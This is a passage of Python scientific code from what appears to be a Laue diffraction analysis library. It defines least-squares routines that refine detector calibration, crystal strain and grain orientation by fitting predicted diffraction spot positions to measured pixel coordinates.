vecteurref=vecteurref,
pureRotation=pureRotation,
verbose=1,
pixelsize=pixelsize,
dim=dim,
weights=weights,
kf_direction=kf_direction)
# print("\n\n***************************\nFitting parameters: ", parameters_being_fitted,
# "\n\n***************************\n")
# # NEEDS AT LEAST 5 spots (len of nspots)
# print("With initial values", param_calib_0)
# setting keywords of _error_function_on_demand_calibration during the fitting because leastsq handle only *args but not **kwds
_error_function_on_demand_calibration.__defaults__ = (initrot,
vecteurref,
pureRotation,
0,
pixelsize,
dim,
weights,
0,
kf_direction)
# For transmission geometry , changing gam scale is useful
# x_scale = [1,1,1,1,.1,1,1,1] 1 except for xgam .1
xscale = np.ones(len(arr_indexvaryingparameters))
try:
posgam = arr_indexvaryingparameters.tolist().index(4)
xscale[posgam] = .1
except ValueError:
pass
#------------------------
calib_sol2 = least_squares(_error_function_on_demand_calibration,
param_calib_0,
args=(miller, allparameters, arr_indexvaryingparameters, nspots, pixX, pixY),
tr_solver = 'exact',
x_scale=xscale, max_nfev=None)
# print("\nLEAST_SQUARES")
# #print("calib_sol2", calib_sol2['x'])
# print(calib_sol2['x'])
# print('mean residues', np.mean(calib_sol2['fun']))
return calib_sol2['x']
# LEASTSQUARE -- NOTE: this legacy path is unreachable; the function returns just above
calib_sol = leastsq(_error_function_on_demand_calibration,
param_calib_0,
args=(miller, allparameters, arr_indexvaryingparameters, nspots, pixX, pixY),
maxfev=5000,
**kwd) # args=(rre,ertetr,) last , is important!
if calib_sol[-1] in (1, 2, 3, 4, 5):
if verbose:
# print("\n\n ************** End of Fitting - Final errors ****************** \n\n")
_error_function_on_demand_calibration(calib_sol[0],
miller,
allparameters,
arr_indexvaryingparameters,
nspots,
pixX,
pixY,
initrot=initrot,
pureRotation=pureRotation,
verbose=verbose,
pixelsize=pixelsize,
dim=dim,
weights=weights,
kf_direction=kf_direction)
return calib_sol[0] # 5 detector parameters + deltaangles
else:
return None
def error_function_on_demand_strain(param_strain,
DATA_Q,
allparameters,
arr_indexvaryingparameters,
nspots,
pixX,
pixY,
initrot=IDENTITYMATRIX,
Bmat=IDENTITYMATRIX,
pureRotation=0,
verbose=0,
pixelsize=165.0 / 2048.,
dim=(2048, 2048),
weights=None,
kf_direction="Z>0"):
"""
#All miller indices must be entered in DATA_Q, selection is done in xy_from_Quat with nspots (array of indices)
# allparameters must contain 5 detector calibration parameters + 5 parameters of strain + 3 angles of elementary rotation
# param_strain must contain values of one or many parameters of allparameters
#
# strain = param_strain[:5]
# deltaangles = param_strain[5:8]
# arr_indexvaryingparameters = array of position of parameters whose values are in param_strain
# e.g.: arr_indexvaryingparameters = array([5,6,7,8,9]) for only fit strain without orientation refinement
# e.g.: arr_indexvaryingparameters = array([5,6,7,8,9, 10,11,12]) for strain AND orientation refinement
# in this function calibration is not refined (but values are needed!), arr_indexvaryingparameters must only contain index >= 5
Bmat= B0 matrix
"""
#print('param_strain in error_function_on_demand_strain', param_strain)
mat1, mat2, mat3 = IDENTITYMATRIX, IDENTITYMATRIX, IDENTITYMATRIX
# arr_indexvaryingparameters = [5,6,7,8,9,10,11,12] first 5 params for strain and 3 last for rotation
index_of_rot_in_arr_indexvaryingparameters = [10, 11, 12]
if index_of_rot_in_arr_indexvaryingparameters[0] in arr_indexvaryingparameters:
ind1 = np.where(
arr_indexvaryingparameters == index_of_rot_in_arr_indexvaryingparameters[0]
)[0][0]
if len(arr_indexvaryingparameters) > 1:
a1 = param_strain[ind1] * DEG
else:
a1 = param_strain[0] * DEG
# print "a1 (rad)= ",a1
mat1 = np.array([[np.cos(a1), 0, np.sin(a1)], [0, 1, 0], [-np.sin(a1), 0, np.cos(a1)]])
if index_of_rot_in_arr_indexvaryingparameters[1] in arr_indexvaryingparameters:
ind2 = np.where(arr_indexvaryingparameters == index_of_rot_in_arr_indexvaryingparameters[1])[0][0]
if len(arr_indexvaryingparameters) > 1:
a2 = param_strain[ind2] * DEG
else:
a2 = param_strain[0] * DEG
# print "a2 (rad)= ",a2
mat2 = np.array([[1, 0, 0], [0, np.cos(a2), np.sin(a2)], [0, np.sin(-a2), np.cos(a2)]])
if index_of_rot_in_arr_indexvaryingparameters[2] in arr_indexvaryingparameters:
ind3 = np.where(
arr_indexvaryingparameters == index_of_rot_in_arr_indexvaryingparameters[2])[0][0]
if len(arr_indexvaryingparameters) > 1:
a3 = param_strain[ind3] * DEG
else:
a3 = param_strain[0] * DEG
mat3 = np.array([[np.cos(a3), -np.sin(a3), 0],
[np.sin(a3), np.cos(a3), 0],
[0, 0, 1]])
deltamat = np.dot(mat3, np.dot(mat2, mat1))
# building B mat
varyingstrain = np.array([[1.0, param_strain[2], param_strain[3]],
[0, param_strain[0], param_strain[4]],
[0, 0, param_strain[1]]])
newmatrix = np.dot(np.dot(deltamat, initrot), varyingstrain)
# # three last parameters are orientation angles in quaternion expression and are here not used
# varying_parameter_value = array(allparameters[:5])
# arr_indexvaryingparameters = arr_indexvaryingparameters [arr_indexvaryingparameters < 5]
# varying_parameter_value: array of value that will be taken into account
# xy_from_Quat only uses 5 detector calibration parameter
# fitting_param: index of position of varying parameters in allparameters array
# allparameters: array of 8 elements: 5 first of calibration parameters and 3 of angles defining quaternion
patchallparam = allparameters.tolist()
# 5 detector parameters + 3 angles + 5 strain components
ally = np.array(patchallparam[:5] + [0, 0, 0] + patchallparam[5:])
if 2 in arr_indexvaryingparameters:
ally[2] = param_strain[-1]
# because elem 5 to 7 are used in quaternion calculation
# TODO : correct also strain calib in the same manner
X, Y, _, _ = xy_from_Quat(allparameters[:5],
DATA_Q,
nspots,
np.arange(5),
ally,
initrot=newmatrix,
vecteurref=Bmat,
pureRotation=0,
labXMAS=0,
verbose=0,
pixelsize=pixelsize,
dim=dim,
kf_direction=kf_direction)
distanceterm = np.sqrt((X - pixX) ** 2 + (Y - pixY) ** 2)
if weights is not None:
allweights = np.sum(weights)
distanceterm = distanceterm * weights / allweights
if verbose:
# if weights is not None:
# print("***********mean weighted pixel deviation ", np.mean(distanceterm), " ********")
# else:
# print("***********mean pixel deviation ", np.mean(distanceterm), " ********")
# print "newmatrix", newmatrix
return distanceterm, deltamat, newmatrix
else:
return distanceterm
def error_function_strain_with_two_orientations(param_strain, DATA_Q, allparameters,
arr_indexvaryingparameters, nspots, pixX, pixY,
initrot=IDENTITYMATRIX,
Bmat=IDENTITYMATRIX,
pureRotation=0,
verbose=0,
pixelsize=165.0 / 2048,
dim=(2048, 2048),
weights=None):
"""
#All miller indices must be entered in DATA_Q, selection is done in xy_from_Quat with nspots (array of indices)
# allparameters must contain 5 detector calibration parameters + 5 parameters of strain + 3 angles of elementary rotation
# param_strain must contain values of one or many parameters of allparameters
#
# strain = param_strain[:5]
# deltaangles = param_strain[5:8]
# arr_indexvaryingparameters = array of position of parameters whose values are in param_strain
# e.g.: arr_indexvaryingparameters = array([5,6,7,8,9]) for only fit strain without orientation refinement
# e.g.: arr_indexvaryingparameters = array([5,6,7,8,9, 10,11,12, 13,14,15]) for strain AND orientation refinement
# in this function calibration is not refined (but values are needed!), arr_indexvaryingparameters must only contain index >= 5
TODO: not implemented for transmission geometry (kf_direction='X>0') and backreflection ('X<0')
.. warning::
not completed !
"""
mat1, mat2, mat3 = IDENTITYMATRIX, IDENTITYMATRIX, IDENTITYMATRIX
# arr_indexvaryingparameters = [5,6,7,8,9,10,11,12] first 5 params for strain and 6 last for misorientation of two grains
index_of_rot_in_arr_indexvaryingparameters_1 = [10, 11, 12]
index_of_rot_in_arr_indexvaryingparameters_2 = [13, 14, 15]
if index_of_rot_in_arr_indexvaryingparameters_1[0] in arr_indexvaryingparameters:
ind1 = np.where(
arr_indexvaryingparameters == index_of_rot_in_arr_indexvaryingparameters_1[0])[0][0]
if len(arr_indexvaryingparameters) > 1:
a1 = param_strain[ind1] * DEG
else:
a1 = param_strain[0] * DEG
# print "a1 (rad)= ",a1
mat1 = np.array([[np.cos(a1), 0, np.sin(a1)],
[0, 1, 0],
[-np.sin(a1), 0, np.cos(a1)]])
if index_of_rot_in_arr_indexvaryingparameters_1[1] in arr_indexvaryingparameters:
ind2 = np.where(
arr_indexvaryingparameters == index_of_rot_in_arr_indexvaryingparameters_1[1])[0][0]
if len(arr_indexvaryingparameters) > 1:
a2 = param_strain[ind2] * DEG
else:
a2 = param_strain[0] * DEG
# print "a2 (rad)= ",a2
mat2 = np.array([[1, 0, 0],
[0, np.cos(a2), np.sin(a2)],
[0, np.sin(-a2), np.cos(a2)]])
if index_of_rot_in_arr_indexvaryingparameters_1[2] in arr_indexvaryingparameters:
ind3 = np.where(
arr_indexvaryingparameters == index_of_rot_in_arr_indexvaryingparameters_1[2])[0][0]
if len(arr_indexvaryingparameters) > 1:
a3 = param_strain[ind3] * DEG
else:
a3 = param_strain[0] * DEG
mat3 = np.array([[np.cos(a3), -np.sin(a3), 0],
[np.sin(a3), np.cos(a3), 0],
[0, 0, 1]])
deltamat_1 = np.dot(mat3, np.dot(mat2, mat1))
if index_of_rot_in_arr_indexvaryingparameters_2[0] in arr_indexvaryingparameters:
ind1 = np.where(
arr_indexvaryingparameters
== index_of_rot_in_arr_indexvaryingparameters_2[0]
)[0][0]
if len(arr_indexvaryingparameters) > 1:
a1 = param_strain[ind1] * DEG
else:
a1 = param_strain[0] * DEG
# print "a1 (rad)= ",a1
mat1 = np.array([[np.cos(a1), 0, np.sin(a1)],
[0, 1, 0],
[-np.sin(a1), 0, np.cos(a1)]])
if index_of_rot_in_arr_indexvaryingparameters_2[1] in arr_indexvaryingparameters:
ind2 = np.where(
arr_indexvaryingparameters
== index_of_rot_in_arr_indexvaryingparameters_2[1])[0][0]
if len(arr_indexvaryingparameters) > 1:
a2 = param_strain[ind2] * DEG
else:
a2 = param_strain[0] * DEG
# print "a2 (rad)= ",a2
mat2 = np.array([[1, 0, 0],
[0, np.cos(a2), np.sin(a2)],
[0, np.sin(-a2), np.cos(a2)]])
if index_of_rot_in_arr_indexvaryingparameters_2[2] in arr_indexvaryingparameters:
ind3 = np.where(
arr_indexvaryingparameters
== index_of_rot_in_arr_indexvaryingparameters_2[2])[0][0]
if len(arr_indexvaryingparameters) > 1:
a3 = param_strain[ind3] * DEG
else:
a3 = param_strain[0] * DEG
mat3 = np.array([[np.cos(a3), -np.sin(a3), 0], [np.sin(a3), np.cos(a3), 0], [0, 0, 1]])
deltamat_2 = np.dot(mat3, np.dot(mat2, mat1))
# building B mat
varyingstrain = np.array(
[[1.0, param_strain[2], param_strain[3]],
[0, param_strain[0], param_strain[4]],
[0, 0, param_strain[1]]])
newmatrix_1 = np.dot(np.dot(deltamat_1, initrot), varyingstrain)
newmatrix_2 = np.dot(np.dot(deltamat_2, initrot), varyingstrain)
# # three last parameters are orientation angles in quaternion expression and are here not used
# varying_parameter_value = array(allparameters[:5])
# arr_indexvaryingparameters = arr_indexvaryingparameters [arr_indexvaryingparameters < 5]
# varying_parameter_value: array of value that will be taken into account
# xy_from_Quat only uses 5 detector calibration parameter
# fitting_param: index of position of varying parameters in allparameters array
# allparameters: array of 8 elements: 5 first of calibration parameters and 3 of angles defining quaternion
patchallparam = allparameters.tolist()
# 5 det parameters + 3 small rotations + 5 strain parameters
ally_1 = np.array(patchallparam[:5] + [0, 0, 0] + patchallparam[5:])
# because elem 5 to 7 are used in quaternion calculation
# TODO : correct also strain calib in the same manner
X1, Y1, _, _ = xy_from_Quat(allparameters[:5],
DATA_Q,
nspots,
np.arange(5),
ally_1,
initrot=newmatrix_1,
vecteurref=Bmat,
pureRotation=0,
labXMAS=0,
verbose=0,
pixelsize=pixelsize,
dim=dim)
distanceterm1 = np.sqrt((X1 - pixX) ** 2 + (Y1 - pixY) ** 2)
# 5 det parameters + 3 small rotations + 5 strain parameters
ally_2 = np.array(patchallparam[:5] + [0, 0, 0] + patchallparam[5:])
# because elem 5 to 7 are used in quaternion calculation
# TODO : correct also strain calib in the same manner
X2, Y2, _, _ = xy_from_Quat(allparameters[:5],
DATA_Q,
nspots,
np.arange(5),
ally_2,
initrot=newmatrix_2,
vecteurref=Bmat,
pureRotation=0,
labXMAS=0,
verbose=0,
pixelsize=pixelsize,
dim=dim)
distanceterm2 = np.sqrt((X2 - pixX) ** 2 + (Y2 - pixY) ** 2)
if weights is not None:
allweights = np.sum(weights)
distanceterm = distanceterm2 * weights / allweights
# print "**mean weighted distanceterm ",mean(distanceterm)," ********"
# print "**mean distanceterm ",mean(distanceterm)," ********"
if verbose:
# if weights is not None:
# print("***********mean weighted pixel deviation ", np.mean(distanceterm), " ********")
# else:
# print("***********mean pixel deviation ", np.mean(distanceterm), " ********")
return distanceterm2, (deltamat_1, deltamat_2), (newmatrix_1, newmatrix_2)
else:
return distanceterm2  # 'distanceterm' is only defined when weights is given
def fit_on_demand_strain(starting_param,
miller,
allparameters,
_error_function_on_demand_strain,
arr_indexvaryingparameters,
nspots,
pixX,
pixY,
initrot=IDENTITYMATRIX,
Bmat=IDENTITYMATRIX,
pureRotation=0,
verbose=0,
pixelsize=165.0 / 2048,
dim=(2048, 2048),
weights=None,
kf_direction="Z>0",
fitycen=False,
**kwd):
"""
To use it:
allparameters = 5calibdetectorparams + fivestrainparameter + 3deltaangles of orientations
starting_param = [fivestrainparameter + 3deltaangles of orientations] = [1,1,0,0,0,0,0,0] typically
arr_indexvaryingparameters = range(5,13)
"""
# All miller indices must be entered in miller, selection is done in xy_from_Quat with nspots (array of indices)
parameters = ["dd", "xcen", "ycen", "angle1", "angle2", "b/a", "c/a",
"a12", "a13", "a23", "theta1", "theta2", "theta3", ]
parameters_being_fitted = [parameters[k] for k in arr_indexvaryingparameters]
param_strain_0 = starting_param
# print('\n\nstarting_param',starting_param)
if verbose:
# print("\n\n***************************\nfirst error with initial values of:",
# parameters_being_fitted, " \n\n***************************\n")
_error_function_on_demand_strain(param_strain_0,
miller,
allparameters,
arr_indexvaryingparameters,
nspots,
pixX,
pixY,
initrot=initrot,
Bmat=Bmat,
pureRotation=pureRotation,
verbose=0,
pixelsize=pixelsize,
dim=dim,
weights=weights,
kf_direction=kf_direction)
# print("\n\n***************************\nFitting parameters: ",
# parameters_being_fitted,
# "\n\n***************************\n")
# # NEEDS AT LEAST 5 spots (len of nspots)
# print("With initial values", param_strain_0)
# setting keywords of _error_function_on_demand_strain during the fitting because leastsq handle only *args but not **kwds
_error_function_on_demand_strain.__defaults__ = (initrot,
Bmat,
pureRotation,
0,
pixelsize,
dim,
weights,
kf_direction)
# LEASTSQUARE
res = leastsq(_error_function_on_demand_strain,
param_strain_0,
args=(miller, allparameters, arr_indexvaryingparameters, nspots, pixX, pixY),
maxfev=5000,
full_output=1,
xtol=1.0e-11,
epsfcn=0.0,
**kwd)
#--------------------- other least square ------------------
# For ycen fitting together strain component, changing ycen scale is useful
# x_scale = [1,1,1,1,.1,1,1,1] 1 except for xgam .1
xscale = np.ones(len(arr_indexvaryingparameters))
try:
xscale[-1] = 100
except ValueError:
pass
if 0:
#------------------------
# from scipy.optimize import leastsq, least_squares
calib_sol2 = least_squares(_error_function_on_demand_strain,
param_strain_0,
args=(miller, allparameters, arr_indexvaryingparameters, nspots, pixX, pixY),
tr_solver = 'exact',
x_scale=xscale, max_nfev=None)
# print("\nLEAST_SQUARES")
# #print("calib_sol2", calib_sol2['x'])
# print(calib_sol2['x'])
# print('mean residues', np.mean(calib_sol2['fun']))
#return calib_sol2['x']
#--------------------- other least square ------------------
strain_sol = res[0]
# print("code results", res[-1])
# print("nb iterations", res[2]["nfev"])
# print("mesg", res[-2])
# if verbose:
# print("strain_sol", strain_sol)
if res[-1] not in (1, 2, 3, 4, 5):
return None
else:
if verbose:
# print("\n\n ************** End of Fitting - Final errors ****************** \n\n")
_error_function_on_demand_strain(strain_sol,
miller,
allparameters,
arr_indexvaryingparameters,
nspots,
pixX,
pixY,
initrot=initrot,
Bmat=Bmat,
pureRotation=pureRotation,
verbose=verbose,
pixelsize=pixelsize,
dim=dim,
weights=weights,
kf_direction=kf_direction)
return strain_sol
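# Hedged sketch mirroring the docstring of fit_on_demand_strain (names such as
# detector5, hkl_array, UB_approx and B0 are illustrative): indices 5..12 of
# allparameters (5 strain parameters + 3 delta angles) are refined.
# allparams = np.concatenate([detector5, [1., 1., 0., 0., 0.], [0., 0., 0.]])
# sol = fit_on_demand_strain(np.array([1., 1., 0., 0., 0., 0., 0., 0.]),
#                            hkl_array, allparams,
#                            error_function_on_demand_strain,
#                            np.arange(5, 13), spot_indices, Xexp, Yexp,
#                            initrot=UB_approx, Bmat=B0)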
def plot_refinement_oneparameter(starting_param,
miller,
allparameters,
_error_function_on_demand_calibration,
arr_indexvaryingparameters,
nspots,
pixX,
pixY,
param_range,
initrot=IDENTITYMATRIX,
vecteurref=IDENTITYMATRIX,
pureRotation=1,
verbose=0,
pixelsize=165.0 / 2048,
dim=(2048, 2048),
weights=None,
kf_direction="Z>0",
**kwd):
"""
All miller indices must be entered in miller,
selection is done in xy_from_Quat with nspots (array of indices)
"""
parameters = ["distance (mm)", "Xcen (pixel)", "Ycen (pixel)",
"Angle1 (deg)", "Angle2 (deg)", "theta1", "theta2", "theta3"]
# parameters_being_fitted = [parameters[k] for k in arr_indexvaryingparameters]
param_calib_0 = starting_param
mini, maxi, nbsteps = param_range
# setting keywords of _error_function_on_demand_calibration during the fitting because leastsq handle only *args but not **kwds
_error_function_on_demand_calibration.__defaults__ = (initrot,
vecteurref,
pureRotation,
0,
pixelsize,
dim,
weights,
0,  # allspots_info -- was missing, which mis-aligned the defaults tuple
kf_direction)
# designed for rotation angle
res = []
for angle in np.linspace(mini, maxi, nbsteps) + param_calib_0:
residues = _error_function_on_demand_calibration(np.array([angle]),
miller,
allparameters,
arr_indexvaryingparameters,
nspots,
pixX,
pixY,
initrot=initrot,
vecteurref=vecteurref,
pureRotation=pureRotation,
verbose=0,
pixelsize=pixelsize,
weights=weights,
kf_direction=kf_direction)
# print "mean(residues)",mean(residues)
res.append([angle, np.mean(residues)])
return res
def error_function_XCEN(param_calib,
DATA_Q,
allparameters,
nspots,
pixX,
pixY,
initrot=IDENTITYMATRIX,
pureRotation=1,
verbose=0,
pixelsize=165.0 / 2048):
"""
seems to be useless ?
"""
# All miller indices must be entered in DATA_Q, selection is done in xy_from_Quat with nspots (array of indices)
# param_orient is three elements array representation of quaternion
X, Y, _, R = xy_from_Quat(param_calib,
DATA_Q,
nspots,
np.arange(8)[1],
allparameters,
initrot=initrot,
pureRotation=pureRotation,
labXMAS=0,
verbose=verbose,
pixelsize=pixelsize)
distanceterm = np.sqrt((X - pixX) ** 2 + (Y - pixY) ** 2)
# print "**mean distanceterm ",mean(distanceterm)," ********"
if verbose:
# print("X", X)
# print("pixX", pixX)
# print("Y", Y)
# print("pixY", pixY)
# print("param_orient", param_calib)
# print("distanceterm", distanceterm)
# print("\n*****************\n\nmean distanceterm ", np.mean(distanceterm), " ********\n")
return distanceterm, R
else:
return distanceterm
def fitXCEN(starting_param,
miller,
allparameters,
_error_function_XCEN,
nspots,
pixX,
pixY,
initrot=np.array([[1, 0, 0], [0, 1, 0], [0, 0, 1.0]]),
pureRotation=1,
verbose=0,
pixelsize=165.0 / 2048,
**kwd):
"""
#All miller indices must be entered in miller,
selection is done in xy_from_Quat with nspots (array of indices)
"""
param_calib_0 = starting_param
if verbose:
# print("\n\n***************************\nfirst error XCEN************************\n")
_error_function_XCEN(param_calib_0,
miller,
allparameters,
nspots,
pixX,
pixY,
initrot=initrot,
pureRotation=pureRotation,
verbose=1,
pixelsize=pixelsize)
# print("\n\n***************************\nFitting XCEN ...\n\n***************************\n")
# print("Starting parameters", param_calib_0)
# setting keywords of _error_function_XCEN during the fitting because leastsq handle only *args but not **kwds
_error_function_XCEN.__defaults__ = (initrot, pureRotation, 0, pixelsize)
calib_sol = leastsq(_error_function_XCEN,
param_calib_0,
args=(miller, allparameters, nspots, pixX, pixY),
**kwd) # args=(rre,ertetr,) last , is important!
# print("calib_sol", calib_sol)
if calib_sol[-1] in (1, 2, 3, 4, 5):
if verbose:
# print("\n\n ************** End of Fitting - Final errors ****************** \n\n")
_error_function_XCEN(calib_sol[0],
miller,
allparameters,
nspots,
pixX,
pixY,
initrot=initrot,
pureRotation=pureRotation,
verbose=verbose,
pixelsize=pixelsize)
return calib_sol[0] # 5 detector parameters
else:
return None
def fit_on_demand_strain_2grains(starting_param,
miller,
allparameters,
_error_function_on_demand_strain_2grains,
arr_indexvaryingparameters,
absolutespotsindices,
pixX,
pixY,
initrot=IDENTITYMATRIX,
B0matrix=IDENTITYMATRIX,
nb_grains=1,
pureRotation=0,
verbose=0,
pixelsize=165.0 / 2048,
dim=(2048, 2048),
weights=None,
kf_direction="Z>0",
**kwd):
"""
Fit a model of two grains of the same material
Initial orientation matrices are the same (only strain state differs)
To use it:
allparameters = 5calibdetectorparams + fivestrainparameters_g1 + 3deltaangles_g1 of orientations
+ fivestrainparameters_g2 + 3deltaangles_g2 of orientations
starting_param = [fivestrainparameter + 3deltaangles of orientations] = [1,1,0,0,0,0,0,0]+[1,1,0,0,0,0,0,0] typically
arr_indexvaryingparameters = range(5,21)
B0matrix : B0 matrix defining a*,b*,c* basis vectors (in columns) in initial orientation / LT frame
"""
# All miller indices must be entered in miller
# selection is done in xy_from_Quat with absolutespotsindices (array of indices)
parameterscalib = ["dd", "xcen", "ycen", "angle1", "angle2"]
strain_g1 = ["b/a", "c/a", "a12", "a13", "a23"]
rot_g1 = ["theta1", "theta2", "theta3"]
strain_g2 = ["b/a", "c/a", "a12", "a13", "a23"]
parameters = parameterscalib + strain_g1 + rot_g1 + strain_g2
parameters_being_fitted = [parameters[k] for k in arr_indexvaryingparameters]
init_strain_values = starting_param
if verbose:
# print("\n\n***************************\nfirst error with initial values of:",
# parameters_being_fitted, " \n\n***************************\n")
_error_function_on_demand_strain_2grains(init_strain_values,
miller,
allparameters,
arr_indexvaryingparameters,
absolutespotsindices,
pixX,
pixY,
initrot=initrot,
B0matrix=B0matrix,
nb_grains=nb_grains,
pureRotation=pureRotation,
verbose=1,
pixelsize=pixelsize,
dim=dim,
weights=weights,
kf_direction=kf_direction)
# print("\n\n***************************\nFitting parameters: ",
# parameters_being_fitted, "\n\n***************************\n")
# # NEEDS AT LEAST 5 spots (len of nspots)
# print("With initial values", init_strain_values)
    # set the keyword defaults of _error_function_on_demand_strain_2grains for the fit, because leastsq handles only *args, not **kwds
_error_function_on_demand_strain_2grains.__defaults__ = (initrot,
B0matrix,
nb_grains,
pureRotation,
0,
pixelsize,
dim,
weights,
kf_direction,
False)
# pixX = np.array(pixX, dtype=np.float64)
# pixY = np.array(pixY, dtype=np.float64)
# LEASTSQUARE
    res = leastsq(_error_function_on_demand_strain_2grains,  # use the function whose defaults were just set
init_strain_values,
args=(
miller,
allparameters,
arr_indexvaryingparameters,
absolutespotsindices,
pixX,
                      pixY),  # args must be a tuple; the trailing comma matters!
maxfev=5000,
full_output=1,
xtol=1.0e-11,
epsfcn=0.0,
**kwd)
strain_sol = res[0]
# print "res", res
# print "code results", res[-1]
# print("nb iterations", res[2]["nfev"])
# if verbose:
# print("strain_sol", strain_sol)
if res[-1] not in (1, 2, 3, 4, 5):
return None
else:
if verbose:
# print("\n\n ************** End of Fitting - Final errors ****************** \n\n")
_error_function_on_demand_strain_2grains(strain_sol,
miller,
allparameters,
arr_indexvaryingparameters,
absolutespotsindices,
pixX,
pixY,
initrot=initrot,
B0matrix=B0matrix,
nb_grains=nb_grains,
pureRotation=pureRotation,
verbose=verbose,
pixelsize=pixelsize,
dim=dim,
weights=weights,
kf_direction=kf_direction,
returnalldata=True)
return strain_sol
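# Hedged usage sketch for fit_on_demand_strain_2grains (illustrative values,
# not real data): following the docstring, allparameters stacks 5 detector
# calibration values, then strain (5) + rotation (3) for grain 1, then
# strain (5) + rotation (3) for grain 2, so range(5, 21) selects all 16
# refinable parameters.
def _demo_fit_two_grains(calib5, miller, absolutespotsindices, pixX, pixY, guessUB):
    # pixX, pixY and absolutespotsindices are per-grain lists: [g1, g2]
    allparameters = list(calib5) + [1, 1, 0, 0, 0] + [0, 0, 0] + [1, 1, 0, 0, 0] + [0, 0, 0]
    starting_param = [1, 1, 0, 0, 0, 0, 0, 0] + [1, 1, 0, 0, 0, 0, 0, 0]
    arr_indexvaryingparameters = np.arange(5, 21)
    return fit_on_demand_strain_2grains(starting_param, miller, allparameters,
                                        error_function_on_demand_strain_2grains,
                                        arr_indexvaryingparameters,
                                        absolutespotsindices, pixX, pixY,
                                        initrot=guessUB, nb_grains=2)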
def error_function_on_demand_strain_2grains(varying_parameters_values,
DATA_Q,
allparameters,
arr_indexvaryingparameters,
absolutespotsindices,
pixX,
pixY,
initrot=IDENTITYMATRIX,
B0matrix=IDENTITYMATRIX,
nb_grains=1,
pureRotation=0,
verbose=0,
pixelsize=165.0 / 2048,
dim=(2048, 2048),
weights=None,
kf_direction="Z>0",
returnalldata=False):
"""
    compute array of errors weight*((Xtheo-pixX)**2+(Ytheo-pixY)**2) for each pair
    Xtheo, Ytheo are derived from kf and the q vector: q = UB Bmat B0 G* where G* = [h, k, l]
    Bmat is the displacement matrix; strain = Bmat - Id
#All miller indices must be entered in DATA_Q, selection is done in xy_from_Quat with absolutespotsindices (array of indices)
# allparameters must contain 5 detector calibration parameters + 5 parameters_g1 of strain + 3 angles_g1 of elementary rotation
# + 5 parameters_g2 of strain
# varying_parameters_values must contain values of one or many parameters of allparameters
#
# strain_g1 = varying_parameters_values[:5]
strain_g2 = varying_parameters_values[8:13]
# deltaangles_g1 = varying_parameters_values[5:8]
# arr_indexvaryingparameters = array of position of parameters whose values are in varying_parameters_values
# e.g.: arr_indexvaryingparameters = array([5,6,7,8,9]) for only fit g1's strain without orientation refinement
# e.g.: arr_indexvaryingparameters = array([5,6,7,8,9, 10,11,12]) for g1's strain AND orientation refinement
# in this function calibration is not refined (but values are needed!), arr_indexvaryingparameters must only contain index >= 5
DATA_Q array of hkl vectors
pixX arrays of pixels exp. peaks X positions [Xs g1,Xs g2]
pixY arrays of pixels exp. peaks Y positions [Ys g1,Ys g2]
absolutespotsindices [absolutespotsindices g1, absolutespotsindices g2]
weights None or [weights g1, weight g2]
initrot = guessed UB orientation matrix
B0matrix B0 matrix defining a*,b*,c* basis vectors (in columns) in initial orientation / LT frame
    TODO: apparently not implemented for transmission geometry (kf_direction='X>0') nor back-reflection ('X<0')
"""
if isinstance(allparameters, np.ndarray):
calibrationparameters = (allparameters.tolist())[:5]
else:
calibrationparameters = allparameters[:5]
    rotationselements_indices = [[10, 11, 12], [18, 19, 20]]  # offset by the 5 leading calibration parameters
strainelements_indices = [[5, 6, 7, 8, 9], [13, 14, 15, 16, 17]]
distances_vector_list = []
all_deltamatrices = []
all_newmatrices = []
for grain_index in list(range(nb_grains)):
mat1, mat2, mat3 = IDENTITYMATRIX, IDENTITYMATRIX, IDENTITYMATRIX
        # arr_indexvaryingparameters = [5,6,7,8,9,10,11,12]: first 5 params for strain, last 3 for rotation
index_of_rot_in_arr_indexvaryingparameters = rotationselements_indices[grain_index]
if index_of_rot_in_arr_indexvaryingparameters[0] in arr_indexvaryingparameters:
ind1 = np.where(arr_indexvaryingparameters == index_of_rot_in_arr_indexvaryingparameters[0])[0][0]
if len(arr_indexvaryingparameters) > 1:
a1 = varying_parameters_values[ind1] * DEG
else:
a1 = varying_parameters_values[0] * DEG
# print "a1 (rad)= ",a1
mat1 = np.array(
[[np.cos(a1), 0, np.sin(a1)], [0, 1, 0], [-np.sin(a1), 0, np.cos(a1)]])
if index_of_rot_in_arr_indexvaryingparameters[1] in arr_indexvaryingparameters:
ind2 = np.where(arr_indexvaryingparameters == index_of_rot_in_arr_indexvaryingparameters[1])[0][0]
if len(arr_indexvaryingparameters) > 1:
a2 = varying_parameters_values[ind2] * DEG
else:
a2 = varying_parameters_values[0] * DEG
# print "a2 (rad)= ",a2
mat2 = np.array(
[[1, 0, 0], [0, np.cos(a2), np.sin(a2)], [0, np.sin(-a2), np.cos(a2)]])
if index_of_rot_in_arr_indexvaryingparameters[2] in arr_indexvaryingparameters:
ind3 = np.where(arr_indexvaryingparameters == index_of_rot_in_arr_indexvaryingparameters[2])[0][0]
if len(arr_indexvaryingparameters) > 1:
a3 = varying_parameters_values[ind3] * DEG
else:
a3 = varying_parameters_values[0] * DEG
mat3 = np.array([[np.cos(a3), -np.sin(a3), 0], [np.sin(a3), np.cos(a3), 0], [0, 0, 1]])
deltamat = np.dot(mat3, np.dot(mat2, mat1))
all_deltamatrices.append(deltamat)
# print("all_deltamatrices", all_deltamatrices)
# building Bmat ------------(triangular up matrix)
index_of_strain_in_arr_indexvaryingparameters = strainelements_indices[grain_index]
# print("arr_indexvaryingparameters", arr_indexvaryingparameters)
# print("varying_parameters_values", varying_parameters_values)
# default parameters
s_list = [1, 1, 0, 0, 0]
for s_index in list(range(5)):
if (
index_of_strain_in_arr_indexvaryingparameters[s_index]
in arr_indexvaryingparameters):
ind1 = np.where(
arr_indexvaryingparameters
== index_of_strain_in_arr_indexvaryingparameters[s_index]
)[0][0]
if len(arr_indexvaryingparameters) > 1:
s_list[s_index] = varying_parameters_values[ind1]
else: # handling fit with single fitting parameter
s_list[s_index] = varying_parameters_values[0]
s0, s1, s2, s3, s4 = s_list
varyingstrain = np.array([[1.0, s2, s3], [0, s0, s4], [0, 0, s1]])
newmatrix = np.dot(np.dot(deltamat, initrot), varyingstrain)
all_newmatrices.append(newmatrix)
# print "varyingstrain", varyingstrain
# print 'all_newmatrices', all_newmatrices
Xmodel, Ymodel, _, _ = calc_XY_pixelpositions(calibrationparameters,
DATA_Q,
absolutespotsindices[grain_index],
UBmatrix=newmatrix,
B0matrix=B0matrix,
pureRotation=0,
labXMAS=0,
verbose=0,
pixelsize=pixelsize,
dim=dim,
kf_direction=kf_direction)
